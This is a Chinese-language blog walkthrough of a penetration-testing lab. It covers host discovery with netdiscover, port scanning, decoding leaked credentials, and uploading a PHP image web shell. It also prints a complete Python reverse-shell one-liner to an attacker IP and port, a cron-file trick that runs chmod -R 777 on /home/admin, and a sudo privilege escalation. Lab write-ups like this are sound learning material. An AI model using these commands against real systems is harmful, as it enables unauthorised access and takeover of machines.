赞
踩
怎么说呢,总的打下来,这个靶场相对来说更接近于ctf一点。
开始。
详细用法:
-i device (网卡设备) 嗅探和注入数据包的网络接口。如果未指定接口,则将使用第一个可用的网卡接口(可用ifconfig命令查看)。
-r range (IP地址范围) 扫描给定范围而不是自动扫描。有效范围值区域例如:192.168.0.0/24,192.168.0.0/16或 192.168.0.0/8。目前,可接受的范围只有/8,/16和/24.(/8,/16,/24代表掩码)。
-l file (给定文件列表) 扫描包含在给定文件中的范围,每行必须只包含一个范围。
-p (passive:被动模式) 启用被动模式。在被动模式下,netdiscover不会发送任何内容,而只会嗅探。
-m file (给定文件列表) 扫描已知MAC和主机名的列表。
-F filter (过滤器) 自定义pcap过滤器表达式(默认值:"arp",过滤器表达式可以自己定义)。
-s time (时间) 每次ARP请求注入之间的睡眠给定时间(指定等待时间,以毫秒为单位)。(默认1)
-n node (节点) 用于扫描的源IP的最后一个IP八位字节(八位二进制).如果已使用默认主机(x.x.x.67),您可以更改它。(允许范围是2到253,默认67)
-c count (计数,发包数量) 发送每个ARP请求的次数。对于有数据包丢失的网络很有用,因此它将扫描每个主机的给定时间.(默认1)
-d 忽略主目录中的配置文件(仅适用于自动扫描和快速模式)。这将使用默认范围和IP进行自动扫描和快速模式。有关配置文件的信息,请参见下文。
-f 启用快速模式扫描。这只会扫描每个网络上的 .1、.100 和 .254,此模式在搜索正在使用的范围时很有用,找到此类范围后,您可以进行特定范围扫描以查找在线主机。
-P 生成适合重定向到文件或由另一个程序解析的输出,而不是使用交互模式。启用此选项,netdiscover将在扫描给定范围后停止(输出一个能让另一个程序解析的格式)。
-L 与-P类似,但在主动扫描后继续执行程序以被动捕获ARP数据包。
-N 不打印标题。仅在启用-P或-L时有效。
netdiscover -i eth0 -r 192.168.107.0/24
确定靶机ip地址。
nmap用SYN方法扫端口发现一个80端口。
然后基于端口重扫。
扫出来robots.txt文件,下面顺便展示了robots.txt下有什么。
那就进网去看看。
发现三个子目录里都是这张图:"这不是你要找的url”。
说明应该是要我们去找url。
找了半天没找到。
最后看了wp,说是ip后加.....
属于是肯尼迪出的题了。
进去之后是这样的,要我们登录,首先想到爆破和post注入。
打开bp抓包然后放进sqlmap里先注入。
发现没结果。
那就再看看网页还有什么东西。
查看源码发现一个eezeepz的名字,一个base64编码。
以图片形式用火狐查看
data:img/png;base64,+base64编码
好像是个密码,那前面那个ez可能就是用户名。
进去了,这里有个文件上传漏洞,说是要上传png,gif,jpg。
那就写个图片马上去,说是传到了uploads上,那就用这个目录打开我们的马。
要养成习惯不管写什么马都多跟一个phpinfo();
因为可以第一时间知道图片马是否成功。
现在看来是成功了。
那就可以反弹shell(为什么标红是因为不会,还得学,这个是看了教程然后看了wp才会的)。
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.107.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
拿到权限之后去eezeepz的目录下查看发现一个notes。
cat一下。
歌词大意:
哟EZ,
我让你可以做一些自动检查,
但我只允许您访问 /usr/bin/* 系统二进制文件。我做了
但是,将一些额外的经常需要的命令复制到我的homedir:chmod, df, cat, echo, ps, grep, egrep
这样你就可以使用它们从 /home/admin/
不要忘记为每个二进制文件指定完整路径!
只需在 /tmp/ 中放入一个名为“runthis”的文件,每行一个命令即可。这
输出转到 /tmp/ 中的文件“cronresult”。它应该
使用“我的帐户”权限运行每分钟。
简单编写
echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
运行之后发现home目录的权限变了。
下面有两个加密后的文件,还有一个加密脚本。
看一下脚本。
那就解一下。
解出来是这个。
加上在home下面我们发现了三个用户。
有个fristigod,那就让用户变成fristigod,密码应该是lettherebefristi!。
进去了,查看权限。
发现有个文件是通过这个可执行文件可以获得全权。
然后看了wp说是。
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom su -
ok了。
1.图片马我原来用的是get方法是传参,但是bash去reshell的时候一直不行,就想着用post,结果还是不行,后来用的python一下就好了,不知道咋回事。
2.linux系统还是不太熟,有些时候代码真不知道怎么写。
3.还是没有养成记笔记的好习惯。
总的来说这个靶场虽然和打起来和ctf差不多,但是费神,也是第一次接触到反弹shell这个东西,还得学吧只能说。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。